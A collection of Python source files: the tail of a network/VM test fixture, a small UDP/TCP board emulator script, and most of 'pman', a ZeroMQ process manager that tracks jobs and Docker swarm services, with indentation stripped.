t = threading.Thread(target=vm_fix.wait_till_vm_is_up, args=())
verify_threads.append(t)
for thread in verify_threads:
time.sleep(0.5)
# thread.daemon = True
thread.start()
for thread in verify_threads:
thread.join(20)
for vm_fix in self.vm_valuelist:
if not vm_fix.verify_vm_flag:
result = result and False
except Exception as e:
print e
result = result and False
finally:
return result
def setUp(self):
super(create_multiple_vn_and_multiple_vm_fixture, self).setUp()
self.createMultipleVN()
time.sleep(5)
self.createMultipleVM()
time.sleep(5)
def cleanUp(self):
super(create_multiple_vn_and_multiple_vm_fixture, self).cleanUp()
vm_thread_to_delete = []
vn_thread_to_delete = []
try:
for vm_fix in self.vm_valuelist:
print 'deleteing vm'
t = threading.Thread(target=vm_fix.cleanUp, args=())
vm_thread_to_delete.append(t)
if vm_thread_to_delete:
for vm_thread in vm_thread_to_delete:
time.sleep(3)
vm_thread.start()
for vm_thread in vm_thread_to_delete:
vm_thread.join()
except Exception as e:
print e
time.sleep(10)
try:
for vn_name, vn_obj in self.vn_obj_dict.items():
vn_obj.cleanUp()
except Exception as e:
print e
try:
for vn_name, vn_obj in self.vn_obj_dict.items():
assert vn_obj.verify_not_in_result
except Exception as e:
print e
|
emu.py
|
import asyncio
import sys, socket
import threading
controller_ip = ('192.168.100.2', 5555)
def udpProcess():
global controller_ip
UDP_HOST = ''
UDP_PORT = 5555
def print_response(conn, e):
global controller_ip
conn.bind(('0.0.0.0', 5556))
print("Init udp reader")
while True:
data, addr = conn.recvfrom(1024)
data = str(data, encoding="utf8")
print("Udp resp: ", data.strip())
if data.find("TCP") > -1:
protocol, ip, port = data.split(":")
controller_ip = (ip, int(port))
print("Controller addr: ", controller_ip)
e.set()
break
print("Start udp part")
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
event = threading.Event()
printRespThread = threading.Thread(target=print_response, args=(sock, event))
printRespThread.start()
while True:
if event.is_set():
print("Start TCP controller addr ", controller_ip)
break
cmd = input("udp>")
if not cmd:
continue
if cmd == "exit":
print("Stop udp part")
break;
sock.sendto(cmd.encode(), (UDP_HOST, UDP_PORT))
print("Close udp connection")
sock.close()
def tcpProcess():
print("Start tcp part")
if not controller_ip:
print("No controller")
return False
def print_response(conn):
print("Init tcp reader")
while True:
data, addr = conn.recvfrom(1024)
data = str(data, encoding="utf8")
print("Tcp resp: ", data.strip())
tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_socket.connect(controller_ip)
printRespThread = threading.Thread(target=print_response, args=(tcp_socket,))
printRespThread.start()
try:
while True:
cmd = input("tcp>")
if not cmd:
continue
if cmd == "exit":
print("Stop tcp part")
break
tcp_socket.sendall(cmd.encode())
except KeyboardInterrupt:
print("Close tcp connection")
tcp_socket.close()
print("Close tcp connection")
def main():
print("Board Emulator v1")
while True:
cmd = input(">>")
if not cmd:
continue
print("Run command: ", cmd)
if cmd == 'udp':
udpProcess()
if cmd == 'tcp':
tcpProcess()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print("Buy buy")
print("Close resources")
sys.exit()
|
pman.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import abc
import time
import os
import threading
import zmq
from webob import Response
import psutil
import queue
from functools import partial
import platform
import multiprocessing
import inspect
import json
import ast
import shutil
import datetime
import socket
import uuid
# pman local dependencies
try:
from ._colors import Colors
from .debug import debug
from .C_snode import *
from .debug import debug
from .openshiftmgr import *
from .crunner import *
except:
from _colors import Colors
from debug import debug
from C_snode import *
from debug import debug
from openshiftmgr import *
from crunner import *
import docker
import pudb
import pprint
str_devNotes = """
08 June 2017
* NOTE: The zmq socket *always* sends back HTTP formatted headers around
the response string. The listening object (usually pfurl) should
*NOT* parse this with --httpResponseBodyParse!
10 May 2017
* Should methods in the listener be functors? Certain methods, such as
'run' and 'status' need specialized implementations based on a run
environment. This run environment is not known by the listener when
it starts, but can be specified at payload parsing by the process()
method. This, a method such as
t_run_process()
might need at arbitrary call time to be specialized to some external
condition set (say by running as a container). Naively, this can be
parsed in the message and thread redirected to
t_run_process_swarm()
for example.
Would a functor type approach be useful at all?
"""
CONTAINER_NAMES = ['container', 'openshift']
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stopper = threading.Event()
def stopit(self):
self._stopper.set()
def stopped(self):
return self._stopper.isSet()
class pman(object):
"""
The server class for the pman (process manager) server
"""
__metaclass__ = abc.ABCMeta
def col2_print(self, str_left, str_right):
self.dp.qprint(Colors.WHITE +
('%*s' % (self.LC, str_left)), end='')
self.dp.qprint(Colors.LIGHT_BLUE +
('%*s' % (self.RC, str_right)) + Colors.NO_COLOUR)
def __init__(self, **kwargs):
"""
Constructor
"""
self.within = None # An encapsulating object
# Description
self.str_desc = ""
self.str_name = ""
self.str_version = ""
self.__name__ = 'pman'
# The main server function
self.threaded_server = None
# The listener thread array -- each element of this array is threaded listener
# object
self.l_listener = []
self.listenerSleep = 0.1
# The fileIO threaded object
self.fileIO = None
# DB
self.b_clearDB = False
self.str_DBpath = '/tmp/pman'
self._ptree = C_stree()
self.str_fileio = 'json'
self.DBsavePeriod = 60
# Comms
self.str_protocol = "tcp"
self.str_IP = "127.0.0.1"
self.str_port = "5010"
self.router_raw = 0
self.listeners = 1
self.b_http = False
self.socket_front = None
self.socket_back = None
# Job info
self.auid = ''
self.jid = ''
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
for key,val in kwargs.items():
if key == 'protocol': self.str_protocol = val
if key == 'IP': self.str_IP = val
if key == 'port': self.str_port = val
if key == 'raw': self.router_raw = int(val)
if key == 'listeners': self.listeners = int(val)
if key == 'listenerSleep': self.listenerSleep = float(val)
if key == 'DBsavePeriod': self.DBsavePeriod = int(val)
if key == 'http': self.b_http = int(val)
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
if key == 'DBpath': self.str_DBpath = val
if key == 'clearDB': self.b_clearDB = val
if key == 'desc': self.str_desc = val
if key == 'name': self.str_name = val
if key == 'version': self.str_version = val
# pudb.set_trace()
# Screen formatting
self.LC = 30
self.RC = 50
self.dp = debug( verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile,
within = self.__name__)
if self.b_clearDB and os.path.isdir(self.str_DBpath):
shutil.rmtree(self.str_DBpath)
print(self.str_desc)
# pudb.set_trace()
self.col2_print('Server is listening on',
'%s://%s:%s' % (self.str_protocol, self.str_IP, self.str_port))
self.col2_print('Router raw mode', str(self.router_raw))
self.col2_print('HTTP response back mode', str(self.b_http))
self.col2_print('listener sleep', str(self.listenerSleep))
# Create the main internal DB data structure/abstraction
self._ptree = C_stree()
# Read the DB from HDD
self.DB_fileIO(cmd = 'load')
# Setup zmq context
self.zmq_context = zmq.Context()
def DB_read(self, **kwargs):
"""
Read the DB from filesystem. If DB does not exist on filesystem,
create an empty DB and save to filesystem.
"""
if os.path.isdir(self.str_DBpath):
self.dp.qprint("Reading pman DB from disk...\n")
self._ptree = C_stree.tree_load(
pathDiskRoot = self.str_DBpath,
loadJSON = True,
loadPickle = False)
self.dp.qprint("pman DB read from disk...\n")
self.col2_print('Reading pman DB from disk:', 'OK')
else:
P = self._ptree
# P.cd('/')
# P.mkdir('proc')
P.tree_save(
startPath = '/',
pathDiskRoot = self.str_DBpath,
failOnDirExist = False,
saveJSON = True,
savePickle = False
)
self.col2_print('Reading pman DB from disk:',
'No DB found... creating empty default DB')
self.dp.qprint(Colors.NO_COLOUR, end='')
def DB_fileIO(self, **kwargs):
"""
Process DB file IO requests. Typically these control the
DB -- save or load.
"""
str_cmd = 'save'
str_DBpath = self.str_DBpath
tree_DB = self._ptree
for k,v in kwargs.items():
if k == 'cmd': str_cmd = v
if k == 'fileio': self.str_fileio = v
if k == 'dbpath': str_DBpath = v
if k == 'db': tree_DB = v
# self.dp.qprint('cmd = %s' % str_cmd)
# self.dp.qprint('fileio = %s' % self.str_fileio)
# self.dp.qprint('dbpath = %s' % str_DBpath)
if str_cmd == 'save':
if os.path.isdir(str_DBpath):
shutil.rmtree(str_DBpath, ignore_errors=True)
#print(tree_DB)
if self.str_fileio == 'json':
tree_DB.tree_save(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
saveJSON = True,
savePickle = False)
if self.str_fileio == 'pickle':
tree_DB.tree_save(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
saveJSON = False,
savePickle = True)
if str_cmd == 'load':
if os.path.isdir(str_DBpath):
self.dp.qprint("Reading pman DB from disk...\n")
if self.str_fileio == 'json':
tree_DB = C_stree.tree_load(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
loadJSON = True,
loadPickle = False)
if self.str_fileio == 'pickle':
tree_DB = C_stree.tree_load(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
loadJSON = False,
loadPickle = True)
self.dp.qprint("pman DB read from disk...\n")
self.col2_print('Reading pman DB from disk:', 'OK')
self._ptree = tree_DB
else:
tree_DB.tree_save(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
saveJSON = True,
savePickle = False
)
self.col2_print('Reading pman DB from disk:',
'No DB found... creating empty default DB')
self.dp.qprint(Colors.NO_COLOUR, end='')
def thread_serve(self):
"""
Serve the 'start' method in a thread.
:return:
"""
self.threaded_server = StoppableThread(target=self.start)
self.threaded_server.start()
while not self.threaded_server.stopped():
time.sleep(1)
# Stop the listeners...
self.dp.qprint("setting b_stopThread on all listeners...")
for i in range(0, self.listeners):
self.dp.qprint("b_stopThread on listener %d and executing join()..." % i)
self.l_listener[i].b_stopThread = True
self.l_listener[i].join()
# Stop the fileIO
self.fileIO.b_stopThread = True
self.dp.qprint("b_stopThread on fileIO executing join()...")
self.fileIO.join()
self.dp.qprint("Shutting down the zmq infrastructure...")
try:
self.dp.qprint('calling self.socket_back.close()')
self.socket_back.close()
except:
self.dp.qprint('Caught exception in closing back socket')
try:
self.dp.qprint('calling self.socket_front.close()')
self.socket_front.close()
except zmq.error.ZMQError:
self.dp.qprint('Caught exception in closing front socket...')
self.dp.qprint('calling zmq_context.term()')
# self.zmq_context.term()
self.dp.qprint("calling join() on all this thread...")
self.threaded_server.join()
self.dp.qprint("shutdown successful...")
def start(self):
"""
Main execution.
* Instantiate several 'listener' worker threads
** 'listener' threads are used to process input from external
processes. In turn, 'listener' threads can thread out
'crunner' threads that actually "run" the job.
* Instantiate a job poller thread
** 'poller' examines the internal DB entries and regularly
queries the system process table, tracking if jobs
are still running.
"""
self.col2_print('Starting Listener threads', self.listeners)
# Front facing socket to accept client connections.
self.socket_front = self.zmq_context.socket(zmq.ROUTER)
self.socket_front.router_raw = self.router_raw
self.socket_front.setsockopt(zmq.LINGER, 1)
self.socket_front.bind('%s://%s:%s' % (self.str_protocol,
self.str_IP,
self.str_port)
)
# Backend socket to distribute work.
self.socket_back = self.zmq_context.socket(zmq.DEALER)
self.socket_back.setsockopt(zmq.LINGER, 1)
self.socket_back.bind('inproc://backend')
# Start the 'fileIO' thread
self.fileIO = FileIO( timeout = self.DBsavePeriod,
within = self,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
self.fileIO.start()
# Start the 'listener' workers... keep track of each
# listener instance so that we can selectively stop
# them later.
for i in range(0, self.listeners):
self.l_listener.append(Listener(
id = i,
context = self.zmq_context,
DB = self._ptree,
DBpath = self.str_DBpath,
http = self.b_http,
within = self,
listenerSleep = self.listenerSleep,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile))
self.l_listener[i].start()
# Use built in queue device to distribute requests among workers.
# What queue device does internally is,
# 1. Read a client's socket ID and request.
# 2. Send socket ID and request to a worker.
# 3. Read a client's socket ID and result from a worker.
# 4. Route result back to the client using socket ID.
self.dp.qprint("*******before zmq.device!!!")
try:
zmq.device(zmq.QUEUE, self.socket_front, self.socket_back)
except:
self.dp.qprint('Hmmm... some error was caught on shutting down the zmq.device...')
self.dp.qprint("*******after zmq.device!!!")
def __iter__(self):
yield('Feed', dict(self._stree.snode_root))
# @abc.abstractmethod
# def create(self, **kwargs):
# """Create a new tree
#
# """
def __str__(self):
"""Print
"""
return str(self.stree.snode_root)
@property
def stree(self):
"""STree Getter"""
return self._stree
@stree.setter
def stree(self, value):
"""STree Getter"""
self._stree = value
class FileIO(threading.Thread):
"""
A class that periodically saves the database from memory out to disk.
"""
def __init__(self, **kwargs):
self.__name = "FileIO"
self.b_http = False
self.str_DBpath = "/tmp/pman"
self.timeout = 60
self.within = None
self.b_stopThread = False
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
for key,val in kwargs.items():
if key == 'DB': self._ptree = val
if key == 'DBpath': self.str_DBpath = val
if key == 'timeout': self.timeout = val
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
self.dp = debug(verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
threading.Thread.__init__(self)
def run(self):
""" Main execution. """
# pudb.set_trace()
# Socket to communicate with front facing server.
while not self.b_stopThread:
# self.dp.qprint('Saving DB as type "%s" to "%s"...' % (
# self.within.str_fileio,
# self.within.str_DBpath
# ))
self.within.DB_fileIO(cmd = 'save')
# self.dp.qprint('DB saved...')
for second in range(0, self.timeout):
if not self.b_stopThread:
time.sleep(1)
else:
break
self.dp.qprint('returning from FileIO run method...')
# raise ValueError('FileIO thread terminated.')
class Listener(threading.Thread):
""" Listeners accept communication requests from front facing server.
Parse input text streams and act accordingly. """
def __init__(self, **kwargs):
self.__name = "Listener"
self.b_http = False
self.poller = None
self.str_DBpath = "/tmp/pman"
self.str_jobRootDir = ''
self.listenerSleep = 0.1
self.jid = ''
self.auid = ''
self.within = None
self.b_stopThread = False
self.openshiftmgr = None
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
for key,val in kwargs.items():
if key == 'context': self.zmq_context = val
if key == 'listenerSleep': self.listenerSleep = float(val)
if key == 'id': self.worker_id = val
if key == 'DB': self._ptree = val
if key == 'DBpath': self.str_DBpath = val
if key == 'http': self.b_http = val
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
self.dp = debug(verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
threading.Thread.__init__(self)
# logging.debug('leaving __init__')
def df_print(self, adict):
"""
Return a nicely formatted string representation of a dictionary
"""
return self.pp.pformat(adict).strip()
def run(self):
""" Main execution. """
# Socket to communicate with front facing server.
self.dp.qprint('starting...')
socket = self.zmq_context.socket(zmq.DEALER)
socket.connect('inproc://backend')
b_requestWaiting = False
resultFromProcessing = False
request = ""
client_id = -1
self.dp.qprint(Colors.BROWN + "Listener ID - %s: run() - Ready to serve..." % self.worker_id)
while not self.b_stopThread:
# wait (non blocking) for input on socket
try:
client_id, request = socket.recv_multipart(flags = zmq.NOBLOCK)
self.dp.qprint('Received %s from client_id: %s' % (request, client_id))
b_requestWaiting = True
except zmq.Again as e:
if self.listenerSleep:
time.sleep(0.1)
else:
pass
if b_requestWaiting:
self.dp.qprint(Colors.BROWN + 'Listener ID - %s: run() - Received comms from client.' % (self.worker_id))
self.dp.qprint(Colors.BROWN + 'Client sends: %s' % (request))
resultFromProcessing = self.process(request)
# pudb.set_trace()
if resultFromProcessing:
self.dp.qprint(Colors.BROWN + 'Listener ID - %s: run() - Sending response to client.' %
(self.worker_id))
self.dp.qprint('JSON formatted response:')
str_payload = json.dumps(resultFromProcessing, sort_keys=False, indent=4)
self.dp.qprint(Colors.LIGHT_CYAN + str_payload)
self.dp.qprint(Colors.BROWN + 'len = %d chars' % len(str_payload))
socket.send(client_id, zmq.SNDMORE)
if self.b_http:
str_contentType = "application/html"
res = Response(str_payload)
res.content_type = str_contentType
str_HTTPpre = "HTTP/1.1 "
str_res = "%s%s" % (str_HTTPpre, str(res))
str_res = str_res.replace("UTF-8", "UTF-8\nAccess-Control-Allow-Origin: *")
self.dp.qprint('HTML response')
self.dp.qprint(str_res.encode())
socket.send(str_res.encode())
else:
str_contentType = "application/json"
res = Response(str_payload)
res.content_type = str_contentType
str_HTTPpre = "HTTP/1.1 "
str_res = '%s%s' % (str_HTTPpre, (res))
self.dp.qprint(str_res)
socket.send_string(str_res)
b_requestWaiting = False
self.dp.qprint('Listener ID - %s: Returning from run()...' % self.worker_id)
# raise('Listener ID - %s: Thread terminated' % self.worker_id)
return True
def t_search_process(self, *args, **kwargs):
"""
Search
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In search process...")
d_request = {}
d_ret = {}
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
b_pathSpec = False
str_path = ""
if 'path' in d_meta:
b_pathSpec = True
str_path = d_meta['path']
b_jobSpec = False
str_jobSpec = ""
if 'job' in d_meta:
b_jobSpec = True
str_jobSpec = d_meta['job']
b_fieldSpec = False
str_fieldSpec = ""
if 'field' in d_meta:
b_fieldSpec = True
str_fieldSpec = d_meta['field']
b_whenSpec = False
str_whenSpec = "end"
if 'when' in d_meta:
b_whenSpec = True
str_whenSpec = d_meta['when']
self.dp.qprint(d_meta)
self.dp.qprint(b_pathSpec)
str_fileName = d_meta['key']
str_target = d_meta['value']
p = self._ptree
str_origDir = p.cwd()
str_pathOrig = str_path
for r in self._ptree.lstr_lsnode('/'):
if p.cd('/' + r)['status']:
str_val = p.cat(str_fileName)
if str_val == str_target:
if not b_pathSpec:
str_path = '/api/v1/' + r + '/' + str_fileName
else:
str_path = '/api/v1/' + r + str_pathOrig
if str_path[-1] == '/': str_path = str_path[:-1]
if b_jobSpec:
str_path = '/api/v1/' + r + '/' + \
str_whenSpec + '/' + \
str_jobSpec + '/' + \
'%sInfo' % str_whenSpec + '/' + \
str_jobSpec + '/' + \
str_fieldSpec
d_ret[str(hits)] = {}
d_ret[str(hits)] = self.DB_get(path = str_path)
hits += 1
p.cd(str_origDir)
return {"d_ret": d_ret,
"status": bool(hits)}
def t_info_process(self, *args, **kwargs):
"""
Check if the job corresponding to the search pattern is "done".
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In info process...")
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_search = self.t_search_process(request = d_request)['d_ret']
p = self._ptree
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathStart = '/api/v1/' + job + '/startInfo'
str_pathEnd = '/api/v1/' + job + '/endInfo'
d_ret[str(hits)+'.0'] = {}
d_ret[str(hits)+'.0'] = self.DB_get(path = str_pathStart)
d_ret[str(hits)+'.1'] = {}
d_ret[str(hits)+'.1'] = self.DB_get(path = str_pathEnd)
hits += 1
if not hits:
d_ret = {
"-1": {
"noJobFound": {
"endInfo": {"allJobsDone": None}
}
}
}
else:
b_status = True
return {"d_ret": d_ret,
"status": b_status}
def t_quit_process(self, *args, **kwargs):
"""
Process the 'quit' POST directive. This might appear counter-inuitive
at first glance since the 'get' is the result of a REST POST, but is
logically consistent within the semantics of this system.
"""
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'saveDB' in d_meta.keys():
self.dp.qprint("Saving DB...")
self.within.DB_fileIO(cmd = 'save')
self.dp.qprint('calling threaded_server.stop()')
self.within.threaded_server.stopit()
self.dp.qprint('called threaded_server.stop()')
return {'d_ret': d_ret,
'status': True}
def t_get_process(self, *args, **kwargs):
"""
Process the 'get' POST directive. This might appear counter-inuitive
at first glance since the 'get' is the result of a REST POST, but is
logically consistent within the semantics of this system.
"""
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
str_path = '/api/v1' + d_meta['path']
d_ret = self.DB_get(path = str_path)
return {'d_ret': d_ret,
'status': True}
def t_fileiosetup_process(self, *args, **kwargs):
"""
Setup a thread with a socket listener. Return listener address to client
"""
self.dp.qprint("In fileiosetup process...")
d_ret = {}
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
d_ret['fileioIP'] = "%s" % self.within.str_IP
d_ret['fileioport'] = "%s" % (int(self.within.str_port) + self.worker_id)
d_ret['serveforever']=d_meta['serveforever']
d_args = {
'ip': d_ret['fileioIP'],
'port': d_ret['fileioport']
}
server = ThreadedHTTPServer((d_args['ip'], int(d_args['port'])), StoreHandler)
server.setup(args = d_args)
self.dp.qprint("serveforever = %d" % d_meta['serveforever'])
b_serveforever = False
if 'serveforever' in d_meta.keys():
b_serveforever = d_meta['serveforever']
if b_serveforever:
self.dp.qprint("about to serve_forever()...")
server.serve_forever()
else:
self.dp.qprint("about to handle_request()...")
server.handle_request()
return {"d_ret": d_ret,
"status": True}
def job_state(self, *args, **kwargs):
"""
Return a structure that can be further processed to determine the job's state.
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In job_state()...")
d_request = {}
d_ret = {}
b_status = False
b_container = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_search = self.t_search_process(request = d_request)['d_ret']
p = self._ptree
Ts = C_stree()
Te = C_stree()
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathStart = '/api/v1/' + job + '/start'
str_pathEnd = '/api/v1/' + job + '/end'
d_start = self.DB_get(path = str_pathStart)
d_end = self.DB_get(path = str_pathEnd)
Ts.initFromDict(d_start)
Te.initFromDict(d_end)
self.dp.qprint("Ts.cwd = %s " % Ts.cwd())
self.dp.qprint(Ts)
self.dp.qprint("Te.cwd = %s " % Te.cwd())
self.dp.qprint(Te)
l_subJobsStart = []
if Ts.cd('/%s/start' % job)['status']:
l_subJobsStart = Ts.lstr_lsnode()
l_subJobsStart = list(map(int, l_subJobsStart))
l_subJobsStart.sort()
self.dp.qprint("l_subJobsStart (pre) = %s" % l_subJobsStart)
if len(l_subJobsStart) > 1: l_subJobsStart = l_subJobsStart[:-1]
l_subJobsEnd = []
if Te.cd('/%s/end' % job)['status']:
l_subJobsEnd = Te.lstr_lsnode()
l_subJobsEnd = list(map(int, l_subJobsEnd))
l_subJobsEnd.sort()
self.dp.qprint("l_subJobsEnd (pre) = %s " % l_subJobsEnd)
if len(l_subJobsEnd) > 1: l_subJobsEnd = l_subJobsEnd[:-1]
self.dp.qprint("l_subJobsStart (post) = %s" % l_subJobsStart)
self.dp.qprint("l_subJobsEnd (post) = %s" % l_subJobsEnd)
for j in l_subJobsStart:
l_subJobsStart[j] = Ts.cat('/%s/start/%d/startInfo/%d/startTrigger' % \
(job, j, j))
# jobsEnd behaviour can be slightly different to the jobStart, particularly if
# the job being executed is killed -- sometimes recording the "death" event of
# the job does not happen and the job indexing ends up missing several epochs:
#
# l_subJobsStart (pre) = [0, 1, 2, 3, 4]
# l_subJobsEnd (pre) = [0, 1, 3, 4]
#
# to assure correct returncode lookup, we always parse the latest job epoch.
latestJob = 0
if len(l_subJobsEnd):
latestJob = l_subJobsEnd[-1]
for j in list(range(0, latestJob+1)):
l_subJobsEnd[j] = Te.cat('/%s/end/%s/endInfo/%d/returncode' % (job, latestJob, j))
T_container = False
str_container_name = None
for container_name in CONTAINER_NAMES:
if p.exists(container_name, path = '/%s' % job):
T_container = C_stree()
p.copy(startPath = '/%s/%s' % (job, container_name), destination = T_container)
str_container_name = container_name
break
if str_container_name:
d_ret[str(hits)+'.'+str_container_name] = {"jobRoot": job, "tree": dict(T_container.snode_root)}
else:
d_ret[str(hits)+'.container'] = {"jobRoot": job, "tree": None}
d_ret[str(hits)+'.start'] = {"jobRoot": job, "startTrigger": l_subJobsStart}
d_ret[str(hits)+'.end'] = {"jobRoot": job, "returncode": l_subJobsEnd}
hits += 1
if not hits:
d_ret['-1.start'] = {"jobRoot": None, "startTrigger": None}
d_ret['-1.end'] = {"jobRoot": None, "returncode": None}
d_ret['-1.container'] = {"jobRoot": None, "tree": None}
else:
b_status = True
return {"hits": hits,
"d_ret": d_ret,
"status": b_status}
def t_done_process(self, *args, **kwargs):
"""
Check if the job corresponding to the search pattern is "done".
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In done process...")
return self.job_state(*args, **kwargs)
def t_status_process(self, *args, **kwargs):
"""
This method is the main (threaded) entry point for returning
information on the status of jobs (both active and historical)
that have been (or are currently) managed by pman.
Originally, the concept of "job" only extended to a command
line process spawned off on the underlying shell. With time,
however, this concept expanded to encompass processes that
are containerized.
While most (if not all) of the use of pman currently is to
handle containerized compute, the status determination logic
still retains the ability to query simple spawned jobs.
The determination about whether or not a job has been
containerized is quite simple -- a token in the internal
job "state" memory structure (the main pman stree "DB")
is checked -- this initial chunk of data is returned by a
call to self.job_state() which delivers a dictionary
representation of the jobRoot in the DB tree.
:param args:
:param kwargs:
:return: dictionary of components defining job state.
"""
self.dp.qprint("In status process...")
# pudb.set_trace()
d_state = self.job_state(*args, **kwargs)
# {
# "hits": hits,
# "d_ret":
# [<index>+'.'+str_container_name] = {
# "jobRoot": job, "tree": dict(T_container.snode_root)
# },
# "status": b_status
# }
d_ret = d_state['d_ret']
b_status = d_state['status']
d_keys = d_ret.items()
l_status = []
l_logs = []
#
# The d_ret keys consist of groups of
#
# *.start
# *.end
# *.container
#
# thus the loop grouping is number of items / 3
#
for i in range(0, int(len(d_keys)/3)):
b_startEvent = d_ret['%s.start' % str(i)]['startTrigger'][0]
try:
endcode = d_ret['%s.end' % str(i)]['returncode'][0]
except:
endcode = None
# pudb.set_trace()
# Was this a containerized job?
found_container = False
## Huh? Why loop over both "container" and "openshift"???
# for container_name in CONTAINER_NAMES:
for container_name in ['container']:
container_path = '%s.%s' % (str(i), container_name)
if container_path in d_state['d_ret'] and d_state['d_ret'][container_path]['tree']:
kwargs['d_state'] = d_state
kwargs['hitIndex'] = str(i)
d_containerStatus = eval("self.t_status_process_%s(*args, **kwargs)" % container_name)
# d_ret {
# 'status': d_ret['status'], # bool
# 'logs': str_logs, # logs from app in container
# 'currentState': d_ret['d_process']['state'] # string of 'finishedSuccessfully' etc
# }
l_status.append(d_containerStatus['currentState'])
l_logs.append(d_containerStatus['logs'])
found_container = True
# The case for non-containerized jobs
if not found_container:
if endcode is None and b_startEvent:
l_status.append('started')
if not endcode and b_startEvent and type(endcode) is int:
l_status.append('finishedSuccessfully')
if endcode and b_startEvent:
l_status.append('finishedWithError')
self.dp.qprint('b_startEvent = %d' % b_startEvent)
self.dp.qprint(endcode)
self.dp.qprint('l_status = %s' % l_status)
d_ret['l_status'] = l_status
d_ret['l_logs'] = l_logs
return {
"d_ret": d_ret,
"status": b_status
}
def DB_store(self, data, str_path, str_file):
"""
In the DB memory tree, simply stores <data> to a location called
<str_path> and a file called <str_file>.
Explicitly separating <str_path> and <str_file> is just for
expedience in checking up on path validity in the DB memory tree.
This method also triggers a DB save event.
"""
if not self._ptree.exists(str_file, path = str_path):
self._ptree.touch('%s/%s' % (str_path, str_file), data)
# Save DB state...
self.within.DB_fileIO(cmd = 'save')
def t_status_process_container_stateObject(self, *args, **kwargs):
"""
This method processes the swarm manager state object and, if
necessary, shuts down the service from the swarm scheduler.
PRECONDITIONS:
o This method should only ever be called by t_status_process_container().
POSTCONDITIONS:
o A string denoting the current state is returned.
o If state is complete and service still running, save state object to
tree and remove service.
o Store the state object and logs in the internal DB tree!
"""
def service_exists(str_serviceName):
"""
Returns a bool:
- True: <str_serviceName> does exist
- False: <str_serviceName> does not exist
"""
b_exists = False
client = docker.from_env()
try:
service = client.services.get(str_serviceName)
b_exists = True
except:
b_exists = False
return b_exists
def service_shutDown_check():
"""
Verifies that a docker service can be shutdown.
Should multiple jobs have been scheduled temporally serially
with the same jid/serviceName, then the actual service can
only be shut down once all identical jobs have had their
state stored.
Returns bool:
- True: can shut down
- False: cannot shut down
"""
ret = False
if int(str_hitIndex) < int(d_jobState['hits'])-1:
ret = False
else:
ret = True
return ret
def service_shutDown(d_serviceInfo):
"""
Shut down a service
"""
client = docker.from_env()
str_cmdShutDown = '%s --remove %s' % \
(d_serviceInfo['managerApp'], d_serviceInfo['serviceName'])
byte_str = client.containers.run(
'%s' % d_serviceInfo['managerImage'],
str_cmdShutDown,
volumes = {
'/var/run/docker.sock':
{
'bind': '/var/run/docker.sock',
'mode': 'rw'
}
},
remove=True)
return byte_str
# pudb.set_trace()
d_serviceState = None
d_jobState = None
str_hitIndex = "0"
str_logs = ""
str_ret = {'state': 'undefined', 'logs': 'undefined'}
b_shutDownService = False
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if k == 'logs': str_logs = v
# Add a clumsy descriptor of this container "type" for processing
# by the t_status_process_state() method.
kwargs['containerType'] = 'container'
if d_serviceState:
d_ret = self.t_status_process_state(**kwargs)
# d_ret {
# 'currentState': str_currentState,
# 'removeJob': b_removeJob,
# 'status': True
# }
if d_ret['removeJob']:
str_jobRoot = d_jobState['d_ret']['%s.%s' % (str_hitIndex, kwargs['containerType'])]['jobRoot']
self._ptree.cd('/%s/container' % str_jobRoot)
d_serviceInfo = {
'serviceName': self._ptree.cat('manager/env/serviceName'),
'managerImage': self._ptree.cat('manager/image'),
'managerApp': self._ptree.cat('manager/app')
}
if service_exists(d_serviceInfo['serviceName']):
service_shutDown(d_serviceInfo)
return {
'status': True,
'd_process': d_ret
}
def t_status_process_container(self, *args, **kwargs):
"""
